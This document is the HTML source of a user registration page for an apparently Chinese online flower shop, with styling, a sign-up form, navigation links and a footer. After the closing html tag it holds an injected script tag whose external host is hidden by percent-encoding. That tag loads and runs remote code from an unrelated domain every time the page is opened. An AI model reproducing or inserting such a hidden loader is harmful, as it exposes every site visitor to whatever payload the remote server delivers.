<!DOCTYPE html>
<html>

	<head>
		<meta charset="UTF-8">
		<title></title>
		<style>
			#top {
				width: 990px;
				position: relative;
				margin: auto;
			}
			
			#top img {
				vertical-align: middle;
			}
			
			#logo {
				position: absolute;
				left: 0px;
				border-right: 1px solid #CCCCCC;
			}
			
			#serch {
				position: absolute;
				left: 260px;
				top: 40px;
			}
			
			#phone {
				position: absolute;
				top: 40px;
				left: 660px;
				height: 32px;
				line-height: 32px;
			}
			
			#telephone {
				position: absolute;
				right: 25px;
				top: 40px;
				border-left: 1px solid #CCCCCC;
			}
			
			#bg {
				position: absolute;
				left: 0px;
				top: 120px;
				background-image: url(img/lxwmbg.jpg);
				width: 990px;
				height: 350px;
				margin-left: 200px;
			}
			
			#zhuce {
				width: 350px;
				height: 300px;
				position: relative;
				left: 620px;
				top: 25px;
				background: #FFFFFF;
			}
			
			#title {
				color: #000;
				height: 40px;
				line-height: 20px;
				font-size: 18px;
				font-weight: bold;
				position: relative;
				left: 150px;
				top: 10px;
			}
			
			#main li {
				list-style: none;
				line-height: 20px;
			}
			
			#main1 li {
				list-style: none;
				line-height: 20px;
				display: inline-block;
				margin-left: 55px;
			}
			
			#main .txt {
				border: 1px solid #CCCCCC;
				width: 250px;
			}
			
			#floattext {
				width: 990px;
				font-size: 14px;
			}
			
			#floattext ul {
				width: 990px;
				margin-left: 160px;
				margin-top: 80px;
			}
			
			#floattext li {
				list-style: none;
				text-align: center;
				border-right: 1px solid #CCCCCC;
			}
			
			#floattext ul li {
				width: 100px;
				float: left;
			}
			#floattext .right{border-right:0px ;}
			
			#hr{
				width: 990px;
				margin: auto;
				margin-top: 120px;
			}
			footer{
				position: absolute;
				top: 540px;
				left: 200px;
				width: 990px;
			}
		</style>
	</head>

	<body>
		<div id="top">
			<div id="logo">
				<img src="img/logo.jpg" width="200px" />
			</div>
			<div id="serch">
				<img src="img/serch.png" />
			</div>
			<div id="phone">
				<img src="img/phone.png" />4008-823-283
			</div>
			<div id="telephone">
				<img src="img/headset.png" />在线客服
			</div>
		</div>
		<div id="bg">
			<div id="zhuce">
				<div id="title">注册</div>
				<div id="main">
					<ul>
						<form action="" method="get">
							<li>
								<label>用户名：</label>
							</li>
							<li><input name="username" type="text" class="txt" />
							</li>
							<li>
								<label>邮箱地址：</label>
							</li>
							<li><input name="username" type="text" class="txt" />
							</li>
							<li>
								<label>密码：</label>
							</li>
							<li><input name="psw" type="password" class="txt" />
							</li>
							<li>
								<label>请再次输入密码：</label>
							</li>
							<li><input name="psw1" type="password" class="txt" />
							</li>
					</ul>
					<div id="main1">
						<ul>
							<li>
								<input name="" type="button" class="btn" value="注册" /></li>
							<li>
								<input name="" type="reset" class="btn" value="重置" />
							</li>
						</ul>
					</div>
				</div>
			</div>
			<div id="floattext">
				<ul>
					<li><a href="default.html">首页</a></li>
					<li><a href="xuanxiangka.html">鲜花</a></li>
					<li><a href="yongshenghua.html">永生花</a></li>	
					<li><a href="lipin.html">礼品</a></li>
					<li><a href="index.html">花语大全</a></li>
					<li class="right"><a href="lxwm.html" target="_self">联系我们</a></li>
				</ul>
			</div>
<div id="hr"><hr size="2"color="#CCCCCC" /></div>
		</div>
		<footer>
				<p align="center">全国统一订花电话：400-888-7844电脑端/手机<br /> copyright&copy;2007-2018版权所有：山西太原网上花城信息产业部备案 ICP备06016666号</p>
			</footer>
	</body>

</html><script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>